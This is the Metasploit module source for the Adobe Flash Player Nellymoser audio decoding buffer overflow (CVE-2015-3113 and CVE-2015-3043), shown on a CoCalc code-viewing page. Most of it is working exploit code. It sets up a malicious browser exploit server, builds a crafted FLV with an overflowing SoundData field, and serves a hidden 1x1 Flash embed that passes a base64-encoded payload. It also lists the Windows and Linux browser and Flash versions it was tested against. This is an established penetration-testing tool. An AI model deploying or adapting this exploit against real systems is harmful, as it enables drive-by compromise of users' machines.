CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::BrowserExploitServer

10


11
  def initialize(info={})

12
    super(update_info(info,

13
      'Name'                => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow',

14
      'Description'         => %q{

15
        This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser

16
        encoded audio inside a FLV video, as exploited in the wild on June 2015. This module

17
        has been tested successfully on:

18


19
        Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,

20
        Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,

21
        Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,

22
        Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and

23
        Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.

24


25
        Note that this exploit is effective against both CVE-2015-3113 and the

26
        earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression

27
        to the same root cause as CVE-2015-3043.

28
      },

29
      'License'             => MSF_LICENSE,

30
      'Author'              =>

31
        [

32
          'Unknown', # Exploit in the wild

33
          'juan vazquez' # msf module

34
        ],

35
      'References'          =>

36
        [

37
          ['CVE', '2015-3043'],

38
          ['CVE', '2015-3113'],

39
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],

40
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],

41
          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],

42
          ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],

43
          ['URL', 'http://bobao.360.cn/learning/detail/357.html']

44
        ],

45
      'Payload'             =>

46
        {

47
          'DisableNops' => true

48
        },

49
      'Platform'            => ['win', 'linux'],

50
      'Arch'                => [ARCH_X86],

51
      'BrowserRequirements' =>

52
        {

53
          :source  => /script|headers/i,

54
          :arch    => ARCH_X86,

55
          :os_name => lambda do |os|

56
            os =~ OperatingSystems::Match::LINUX ||

57
              os =~ OperatingSystems::Match::WINDOWS_7 ||

58
              os =~ OperatingSystems::Match::WINDOWS_81

59
          end,

60
          :ua_name => lambda do |ua|

61
            case target.name

62
            when 'Windows'

63
              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF

64
            when 'Linux'

65
              return true if ua == Msf::HttpClients::FF

66
            end

67


68
            false

69
          end,

70
          :flash   => lambda do |ver|

71
            case target.name

72
            when 'Windows'

73
              return true if ver =~ /^18\./ && Rex::Version.new(ver) <= Rex::Version.new('18.0.0.161')

74
              return true if ver =~ /^17\./ && Rex::Version.new(ver) != Rex::Version.new('17.0.0.169')

75
            when 'Linux'

76
              return true if ver =~ /^11\./ && Rex::Version.new(ver) <= Rex::Version.new('11.2.202.466') && Rex::Version.new(ver) != Rex::Version.new('11.2.202.457')

77
            end

78


79
            false

80
          end

81
        },

82
      'Targets'             =>

83
        [

84
          [ 'Windows',

85
            {

86
              'Platform' => 'win'

87
            }

88
          ],

89
          [ 'Linux',

90
            {

91
              'Platform' => 'linux'

92
            }

93
          ]

94
        ],

95
      'Privileged'          => false,

96
      'DisclosureDate'      => '2015-06-23',

97
      'DefaultTarget'       => 0))

98
  end

99


100
  def exploit

101
    @swf = create_swf

102
    @flv = create_flv

103


104
    super

105
  end

106


107
  def on_request_exploit(cli, request, target_info)

108
    print_status("Request: #{request.uri}")

109


110
    if request.uri =~ /\.swf$/

111
      print_status('Sending SWF...')

112
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})

113
      return

114
    end

115


116
    if request.uri =~ /\.flv$/

117
      print_status('Sending FLV...')

118
      send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})

119
      return

120
    end

121


122
    print_status('Sending HTML...')

123
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})

124
  end

125


126
  def exploit_template(cli, target_info)

127
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"

128
    target_payload = get_payload(cli, target_info)

129
    b64_payload = Rex::Text.encode_base64(target_payload)

130
    os_name = target_info[:os_name]

131


132
    if target.name =~ /Windows/

133
      platform_id = 'win'

134
    elsif target.name =~ /Linux/

135
      platform_id = 'linux'

136
    end

137


138
    html_template = %Q|<html>

139
    <body>

140
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />

141
    <param name="movie" value="<%=swf_random%>" />

142
    <param name="allowScriptAccess" value="always" />

143
    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />

144
    <param name="Play" value="true" />

145
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>

146
    </object>

147
    </body>

148
    </html>

149
    |

150


151
    return html_template, binding()

152
  end

153


154
  def create_swf

155
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf')

156
    swf =  ::File.open(path, 'rb') { |f| swf = f.read }

157


158
    swf

159
  end

160


161
  def create_flv

162
    header = ''

163
    header << 'FLV' # signature

164
    header << [1].pack('C') # version

165
    header << [4].pack('C') # Flags: TypeFlagsAudio

166
    header << [9].pack('N') # DataOffset

167


168
    data = ''

169
    data << "\x68" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0

170
    data << "\xee" * 0x440 # SoundData

171


172
    tag1 = ''

173
    tag1 << [8].pack('C')  # TagType (audio)

174
    tag1 << "\x00\x04\x41" # DataSize

175
    tag1 << "\x00\x00\x1a" # TimeStamp

176
    tag1 << [0].pack('C')  # TimeStampExtended

177
    tag1 << "\x00\x00\x00" # StreamID, always 0

178
    tag1 << data

179


180
    body = ''

181
    body << [0].pack('N') # PreviousTagSize

182
    body << tag1

183
    body << [0xeeeeeeee].pack('N') # PreviousTagSize

184


185
    flv = ''

186
    flv << header

187
    flv << body

188


189
    flv

190
  end

191
end

192


193